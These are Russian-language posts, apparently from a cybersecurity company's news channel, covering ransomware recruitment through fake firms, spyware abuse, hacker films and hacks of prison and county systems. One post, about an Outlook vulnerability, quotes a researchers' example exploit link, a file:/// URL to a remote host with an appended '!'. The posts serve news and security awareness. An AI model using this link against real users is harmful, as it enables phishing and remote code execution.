3side кибербезопасности

Как российские кибервымогатели вербуют специалистов под видом легального бизнеса Самое "прекрасное" в недавней истории про SugarLocker — не в том, как вымогатели работали, а в том, как они вербовали людей. А делали они это под видом вполне легальной компании с прекрасным названием Shtazi-IT. То есть еще раз, киберкриминал вполне официально мог давать объявление на условном HH. Кстати, история в России далеко не самая редкая, мы сами натыкались на "странные" вакансии. К слову, в США тоже были похожие истории. Например, в 21 году там участник хакерской группировки FIN7 получил семь лет тюрьмы. На суде его адвокат заявлял, что в группировку тот попал случайно — после того, как откликнулся на объявление о вакансии в ИБ-компании Combi Security. Мы это к чему. Вербовка ИБ-специалистов в рансом на вполне легальных площадках — это вполне себе современная действительность.

Добро пожаловать на рынок кибербезопасности, Александр! Если без иронии, то этот пост чуть более чем описывает состояние рынка услуг ИБ в России. Вы или ищете друга, у которого есть друг, и рассчитываете на порядочность всех участников цепочки, или платите "сантехнику" за 100500 рублей в час. Ну, или покупаете стартап по прочистке труб/нанимаете команду. Сервисы (вроде 3side, но не только) не просто делают жизнь проще. Они исправляют ассиметрию информации и превращают "восточный базар" в эффективный рынок, на котором жить становится проще примерно всем.

Публичный эксплойт на критическую уязвимость Microsoft Outlook Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт! Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге. Для защиты рекомендуется как можно быстрее установить обновление приложения. Подробное описание уязвимости тут. Оригинальное исследование тут.

В продолжение недавнего видеоинтервью для Garantex Очень детальная и подробная подборка устройств с описанием их функций и преимуществ/недостатков. От себя повторим, что параллельный импорт-игрушка дьявола, и относиться к нему стоит очень — очень осторожно. А полную версию интервью можно посмотреть здесь.

Меняются технологии, люди остаются Небольшой развлекательно-исторический лонг о том, как "ловили" первых хакеров и как ломали американскую оборонку. Спойлер: изменилось не так много, как может показаться. https://telegra.ph/KGB-hakery-The-Illuminatus-02-12

3side медиа-партнер форума «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ» Разместили анонс и приглашаем поучаствовать! От нас на Форуме будет Антон Бочкарев в качестве слушателя, смело подходите на нетворк.

❕4 апреля 2024 г. в Москве состоится Форум «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ». 🗣 Спикеры КОНФЕРЕНЦИЙ 2024 ГОДА: 🔸 PRO расследования инцидентов: https://www.comnews-conferences.ru/tb2024/ri 🔹 PRO обнаружение угроз: https://www.comnews-conferences.ru/tb2024/ou 🔸 PRO управление уязвимостями: https://www.comnews-conferences.ru/tb2024/uu 🔹 PRO безопасную разработку: https://www.comnews-conferences.ru/tb2024/br 📍 HYATT REGENCY MOSCOW PETROVSKY PARK 💁‍♂️Регистрация:https://www.comnews-conferences.ru/tb2024/registration ❗️Участие для руководителей ИБ-департаментов БЕСПЛАТНОЕ! ❗️ При оплате до 1 марта 2024 г. действуетльготная стоимость участия для делегатов-слушателей! ✉️ Выступить с докладом на конференциях или стать экспонентном: [email protected]

Ой, а кто это сделал?! Тут в Иордании очередной скандал, связанный с шпионским ПО от израильтян из NSO Group. Pegus использовали для слежки за оппозиционными активистами. Как говорится, никогда не было, и вот опять. "Внезапно" выяснилось, что рано или поздно практически любая страна начинает использовать шпионский софт не только для борьбы с наркоторговцами и разными экстремистами, но и для слежки за политическими оппонентами правящей партии. Причем не важно, идет речь об Иордании или Мексике, или о демократической Польше. Разве что в ЕС скандал будет погромче. Оказывается, если продавать кибероружие, то его могут использовать не по назначению. Ну, или очень даже по назначению. Хочется добавить голосом Галустяна из Нашей Раши: "Ой, а кто это сделал?" И правда, очень неожиданно. Ничего же не предвещало.

Хакеры в кино В прошлом посте, я упомянул сериал Мистер Робот. Это хороший пример того, как можно показывать кибербез в кино. А недавно меня попросили высказаться про наиболее частый образ хакеров в кино, и спросили еще нескольких коллег с ИБ рынка. А в конце статьи ссылка на гит, с неплохим спискам фильмов/сериалов хоть как-то связанных с хакерами, рекомендую! Но квинтесенция стеба, как это выглядит тут - https://youtu.be/pgl37R7hILE.

Взлом тюрьмы В кино неоднократно показывали, как некий хакер ломает тюрьму, и толпы заключённых бегут на свободу! Например, эпизод - "eps1.5_br4ve-trave1er.asf" сериала Мистер Робот. В 2017 году злоумышленник из Мичигана попытался освободить своего друга из тюрьмы успешно взломав один из компьютеров администрации, с помощью классического двойного фишинга. Сначала было отправлено письмо, а потом он звонил в тюрьму и убедил сотрудников письмо открыть и запустить вредонос, объяснял все срочными обновлениями. Далее получил учетные данные одного из сотрудников и распространил свой вирус на другие компьютеры администрации. В итоге он получил доступ к: - Системе XJail (осуществляет мониторинга и отслеживание заключённых) - Данным о показаниях - Внутренним данным тюрьмы Собрал базу данных более чем 1500 сотрудников, включая их логины, пароли и персональные данные. А позднее он перешел к главной цели, изменил дату освобождения одного из заключенных - его друга. Казалось бы успех? Но нет, в тюрьме было всего около 200 заключенных мужчин и они хорошо знали даты освобождения друг друга. Начали расследование об изменении данных, привлекли частную компанию для расследования, и злоумышленника быстро нашли. Но, на днях случился еще один и уже УСПЕШНЫЙ эпизод освобождения. В 2020 году был задержан по подозрению в убийстве 30-летний Зайон Ривер Шака. Расследование шло своим чередом, подозреваемого регулярно возили в суд на слушания, пока судебные и телефонные и налоговые системы округа Клейтон Джорджии не были взломаны. Туда подозреваемого перевели временно, на время очередных слушаний. Взлом систем округа сопровождался не модификацией данных, а цитата "широкомасштабным отключением систем", скорее всего дело рук распространителей шифровальщиков. И в результате недоступности данных подозреваемого случайно отпустили после слушания, а не вернули в тюрьму. В данный момент его местонахождение неизвестно, ведется розыск. Теперь ожидаем эпизода целенаправленного освобождения, если уже почти получилось в 2017 и получилось, но случайно в 2024, то это явно вопрос времени!

❗Мы начинаем Присоединяйтесь к АМА-сессии с экспертом по кибербезопасности Антоном Бочкаревым на канале Garantex прямо сейчас.

Всем привет! У нас тут вовсю идет стрим с Garantex про кибербезопасность и крипту. Присоединяйтесь!